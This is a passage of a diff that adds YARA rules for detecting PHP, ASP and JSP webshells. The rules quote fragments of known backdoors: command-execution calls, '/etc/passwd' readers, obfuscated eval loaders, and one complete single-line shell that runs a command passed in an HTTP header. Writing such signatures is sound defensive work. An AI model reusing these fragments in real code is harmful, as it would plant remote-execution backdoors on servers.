+ $s5 = " echo \"<pre>\";" fullword
+ $s6 = "if(isset($_REQUEST['cmd'])){" fullword
+ $s7 = " die;" fullword
+ $s8 = " system($cmd);" fullword
+ condition:
+ all of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {
+ meta:
+ description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+ author = "Florian Roth"
+ hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
+ strings:
+ $s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+ $s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
+ $s4 = "$v = @ini_get(\"open_basedir\");" fullword
+ $s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_NTDaddy_v1_9 {
+ meta:
+ description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+ author = "Florian Roth"
+ hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
+ strings:
+ $s2 = "| -obzerve : mr_o@ihateclowns.com |" fullword
+ $s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+ $s13 = "<form action=ntdaddy.asp method=post>" fullword
+ $s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_lamashell {
+ meta:
+ description = "PHP Webshells Github Archive - file lamashell.php"
+ author = "Florian Roth"
+ hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
+ strings:
+ $s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
+ $s8 = "$curcmd = $_POST['king'];" fullword
+ $s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
+ $s18 = "<title>lama's'hell v. 3.0</title>" fullword
+ $s19 = "_|_ O _ O _|_" fullword
+ $s20 = "$curcmd = \"ls -lah\";" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_Simple_PHP_backdoor_by_DK {
+ meta:
+ description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+ author = "Florian Roth"
+ hash = "03f6215548ed370bec0332199be7c4f68105274e"
+ strings:
+ $s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+ $s1 = "<!-- http://michaeldaw.org 2006 -->" fullword
+ $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+ $s6 = "if(isset($_REQUEST['cmd'])){" fullword
+ $s8 = "system($cmd);" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {
+ meta:
+ description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+ author = "Florian Roth"
+ hash = "31e5473920a2cc445d246bc5820037d8fe383201"
+ strings:
+ $s4 = "$content = chunk_split(base64_encode($content)); " fullword
+ $s12 = "print \"Sending mail to $to....... \"; " fullword
+ $s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
+ condition:
+ all of them
+}
+rule WebShell_C99madShell_v__2_0_madnet_edition {
+ meta:
+ description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+ author = "Florian Roth"
+ hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
+ strings:
+ $s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+ $s1 = "eval(gzinflate(base64_decode('"
+ $s2 = "$pass = \"\"; //Pass" fullword
+ $s3 = "$login = \"\"; //Login" fullword
+ $s4 = "//Authentication" fullword
+ condition:
+ all of them
+}
+rule WebShell_CmdAsp_asp_php {
+ meta:
+ description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+ author = "Florian Roth"
+ hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
+ strings:
+ $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+ $s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
+ $s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
+ $s6 = "' --------------------o0o--------------------" fullword
+ $s8 = "' File: CmdAsp.asp" fullword
+ $s11 = "<-- CmdAsp.asp -->" fullword
+ $s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+ $s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+ $s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+ condition:
+ 4 of them
+}
+rule WebShell_NCC_Shell {
+ meta:
+ description = "PHP Webshells Github Archive - file NCC-Shell.php"
+ author = "Florian Roth"
+ hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
+ strings:
+ $s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
+ $s1 = "<b>--Coded by Silver" fullword
+ $s2 = "<title>Upload - Shell/Datei</title>" fullword
+ $s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
+ $s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
+ $s18 = "printf(\"Sie ist %u Bytes gro" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_php_webshells_README {
+ meta:
+ description = "PHP Webshells Github Archive - file README.md"
+ author = "Florian Roth"
+ hash = "ef2c567b4782c994db48de0168deb29c812f7204"
+ strings:
+ $s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+ $s1 = "php-webshells" fullword
+ condition:
+ all of them
+}
+rule WebShell_backupsql {
+ meta:
+ description = "PHP Webshells Github Archive - file backupsql.php"
+ author = "Florian Roth"
+ hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
+ strings:
+ $s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
+ $s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+ $s2 = "* as email attachment, or send to a remote ftp server by" fullword
+ $s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
+ $s17 = "$from = \"Neu-Cool@email.com\"; // Who should the emails be sent from?, may "
+ condition:
+ 2 of them
+}
+rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {
+ meta:
+ description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+ author = "Florian Roth"
+ hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
+ strings:
+ $s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+ $s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
+ $s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_php_webshells_cpanel {
+ meta:
+ description = "PHP Webshells Github Archive - file cpanel.php"
+ author = "Florian Roth"
+ hash = "433dab17106b175c7cf73f4f094e835d453c0874"
+ strings:
+ $s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
+ $s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
+ $s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
+ $s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
+ $s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
+ $s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_accept_language {
+ meta:
+ description = "PHP Webshells Github Archive - file accept_language.php"
+ author = "Florian Roth"
+ hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
+ strings:
+ $s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+ condition:
+ all of them
+}
+rule WebShell_php_webshells_529 {
+ meta:
+ description = "PHP Webshells Github Archive - file 529.php"
+ author = "Florian Roth"
+ hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
+ strings:
+ $s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
+ $s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
+ $s9 = "echo '<PRE><P>This is exploit from <a " fullword
+ $s10 = "This Exploit Was Edited By KingDefacer" fullword
+ $s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
+ $s14 = "$hardstyle = explode(\"/\", $file); " fullword
+ $s20 = "while($level--) chdir(\"..\"); " fullword
+ condition:
+ 2 of them
+}
+rule WebShell_STNC_WebShell_v0_8 {
+ meta:
+ description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+ author = "Florian Roth"
+ hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
+ strings:
+ $s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+ $s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
+ $s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
+ condition:
+ 2 of them
+}
+rule WebShell_php_webshells_tryag {
+ meta:
+ description = "PHP Webshells Github Archive - file tryag.php"
+ author = "Florian Roth"
+ hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
+ strings:
+ $s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
+ $s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
+ $s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
+ $s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
+ $s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
+ condition:
+ 3 of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {
+ meta:
+ description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+ author = "Florian Roth"
+ hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
+ strings:
+ $s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+ $s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
+ $s13 = "header(\"Content-type: image/gif\");" fullword
+ $s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
+ $s20 = "if (isset($_GET['rename_all'])) {" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_qsd_php_backdoor {
+ meta:
+ description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+ author = "Florian Roth"
+ hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
+ strings:
+ $s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
+ $s2 = "if(isset($_POST[\"newcontent\"]))" fullword
+ $s3 = "foreach($parts as $val)//Assemble the path back together" fullword
+ $s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_php_webshells_spygrup {
+ meta:
+ description = "PHP Webshells Github Archive - file spygrup.php"
+ author = "Florian Roth"
+ hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
+ strings:
+ $s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
+ $s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
+ $s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
+ $s18 = "By KingDefacer From Spygrup.org>" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_Web_shell__c_ShAnKaR {
+ meta:
+ description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+ author = "Florian Roth"
+ hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
+ strings:
+ $s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+ $s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
+ $s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+ $s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {
+ meta:
+ description = "PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php"
+ author = "Florian Roth"
+ hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
+ strings:
+ $s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
+ $s11 = "directory... Trust me - it works :-) */" fullword
+ $s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
+ $s16 = "} else if ($command == 'ls') {" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_Gamma_Web_Shell {
+ meta:
+ description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+ author = "Florian Roth"
+ hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+ strings:
+ $s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+ $s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+ $s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+ $s20 = "my $command = $self->query('command');" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_php_webshells_aspydrv {
+ meta:
+ description = "PHP Webshells Github Archive - file aspydrv.php"
+ author = "Florian Roth"
+ hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
+ strings:
+ $s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\" ' ---Directory to which files"
+ $s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+ $s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+ $s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+ $s20 = "' ---Copy Too Folder routine Start" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_JspWebshell_1_2_2 {
+ meta:
+ description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+ author = "Florian Roth"
+ hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
+ strings:
+ $s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+ $s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+ $s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+ $s15 = "endPoint=random1.getFilePointer();" fullword
+ $s20 = "if (request.getParameter(\"command\") != null) {" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_g00nshell_v1_3 {
+ meta:
+ description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+ author = "Florian Roth"
+ hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
+ strings:
+ $s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+ $s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+ $s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+ $s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+ $s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_WinX_Shell {
+ meta:
+ description = "PHP Webshells Github Archive - file WinX Shell.php"
+ author = "Florian Roth"
+ hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
+ strings:
+ $s4 = "// It's simple shell for all Win OS." fullword
+ $s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
+ $s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
+ $s13 = "// Created by greenwood from n57" fullword
+ $s20 = " if (is_uploaded_file($userfile)) {" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_PHANTASMA {
+ meta:
+ description = "PHP Webshells Github Archive - file PHANTASMA.php"
+ author = "Florian Roth"
+ hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
+ strings:
+ $s12 = "\" printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
+ $s15 = "if ($portscan != \"\") {" fullword
+ $s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
+ $s20 = "$dono = get_current_user( );" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_php_webshells_cw {
+ meta:
+ description = "PHP Webshells Github Archive - file cw.php"
+ author = "Florian Roth"
+ hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
+ strings:
+ $s1 = "// Dump Database [pacucci.com]" fullword
+ $s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
+ $s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
+ $s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
+ $s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
+ $s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_php_include_w_shell {
+ meta:
+ description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+ author = "Florian Roth"
+ hash = "1a7f4868691410830ad954360950e37c582b0292"
+ strings:
+ $s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+ $s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+ $s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_mysql_tool {
+ meta:
+ description = "PHP Webshells Github Archive - file mysql_tool.php"
+ author = "Florian Roth"
+ hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
+ strings:
+ $s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+ $s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_PhpSpy_Ver_2006 {
+ meta:
+ description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+ author = "Florian Roth"
+ hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
+ strings:
+ $s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+ $s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+ $s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
+ $s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
+ condition:
+ 1 of them
+}
+rule WebShell_ZyklonShell {
+ meta:
+ description = "PHP Webshells Github Archive - file ZyklonShell.php"
+ author = "Florian Roth"
+ hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
+ strings:
+ $s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+ $s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+ $s2 = "<TITLE>404 Not Found</TITLE>" fullword
+ $s3 = "<H1>Not Found</H1>" fullword
+ condition:
+ all of them
+}
+rule WebShell_php_webshells_myshell {
+ meta:
+ description = "PHP Webshells Github Archive - file myshell.php"
+ author = "Florian Roth"
+ hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
+ strings:
+ $s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
+ $s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+ $s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+ $s16 = "}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
+ condition:
+ 1 of them
+}
+rule WebShell_php_webshells_lolipop {
+ meta:
+ description = "PHP Webshells Github Archive - file lolipop.php"
+ author = "Florian Roth"
+ hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
+ strings:
+ $s3 = "$commander = $_POST['commander']; " fullword
+ $s9 = "$sourcego = $_POST['sourcego']; " fullword
+ $s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+ condition:
+ all of them
+}
+rule WebShell_simple_cmd {
+ meta:
+ description = "PHP Webshells Github Archive - file simple_cmd.php"
+ author = "Florian Roth"
+ hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
+ strings:
+ $s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+ $s2 = "<title>G-Security Webshell</title>" fullword
+ $s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+ $s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_go_shell {
+ meta:
+ description = "PHP Webshells Github Archive - file go-shell.php"
+ author = "Florian Roth"
+ hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
+ strings:
+ $s0 = "#change this password; for power security - delete this file =)" fullword
+ $s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
+ $s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
+ $s12 = "print << \"[kalabanga]\";" fullword
+ $s13 = "<title>GO.cgi</title>" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_aZRaiLPhp_v1_0 {
+ meta:
+ description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+ author = "Florian Roth"
+ hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
+ strings:
+ $s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
+ $s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+ $s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+ $s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_webshells_zehir4 {
+ meta:
+ description = "Webshells Github Archive - file zehir4"
+ author = "Florian Roth"
+ hash = "788928ae87551f286d189e163e55410acbb90a64"
+ score = 55
+ strings:
+ $s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
+ $s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com"
+ condition:
+ 1 of them
+}
+rule WebShell_zehir4_asp_php {
+ meta:
+ description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+ author = "Florian Roth"
+ hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
+ strings:
+ $s4 = "response.Write \"<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&"
+ $s11 = "frames.byZehir.document.execCommand("
+ $s15 = "frames.byZehir.document.execCommand(co"
+ condition:
+ 2 of them
+}
+rule WebShell_php_webshells_lostDC {
+ meta:
+ description = "PHP Webshells Github Archive - file lostDC.php"
+ author = "Florian Roth"
+ hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
+ strings:
+ $s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
+ $s4 = "header ( \"Content-Description: Download manager\" );" fullword
+ $s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
+ $s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
+ $s12 = "$ret = shellexec($command);" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_CasuS_1_5 {
+ meta:
+ description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+ author = "Florian Roth"
+ hash = "7eee8882ad9b940407acc0146db018c302696341"
+ strings:
+ $s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
+ $s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
+ $s18 = "if (file_exists(\"F:\\\\\")){" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_ftpsearch {
+ meta:
+ description = "PHP Webshells Github Archive - file ftpsearch.php"
+ author = "Florian Roth"
+ hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
+ strings:
+ $s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
+ $s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
+ $s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
+ $s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
+ condition:
+ 2 of them
+}
+rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {
+ meta:
+ description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+ hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+ hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+ strings:
+ $s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
+ $s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
+ $s11 = " * Coded by Pixcher" fullword
+ $s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+ condition:
+ 2 of them
+}
+rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {
+ meta:
+ description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
+ hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
+ hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
+ strings:
+ $s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
+ $s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
+ $s3 = "$dt = $_POST['filecontent'];" fullword
+ $s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
+ $s6 = "print \"Sorry, none of the command functions works.\";" fullword
+ $s11 = "document.cmdform.command.value='';" fullword
+ $s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
+ condition:
+ 3 of them
+}
+rule WebShell_Generic_PHP_7 {
+ meta:
+ description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "de98f890790756f226f597489844eb3e53a867a9"
+ hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+ hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+ hash3 = "715f17e286416724e90113feab914c707a26d456"
+ strings:
+ $s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+ $s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+ $s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+ $s4 = "if( $action == \"dumpTable\" )" fullword
+ condition:
+ 2 of them
+}
+rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {
+ meta:
+ description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "b148ead15d34a55771894424ace2a92983351dda"
+ hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+ hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+ hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
+ strings:
+ $s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+ $s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+ $s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+ $s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_Generic_PHP_8 {
+ meta:
+ description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
+ hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
+ hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
+ strings:
+ $s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
+ $s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+ $s3 = "/* I added this to ensure the script will run correctly..." fullword
+ $s14 = "<!-- </form> -->" fullword
+ $s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
+ $s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
+ condition:
+ 3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {
+ meta:
+ description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+ hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+ hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
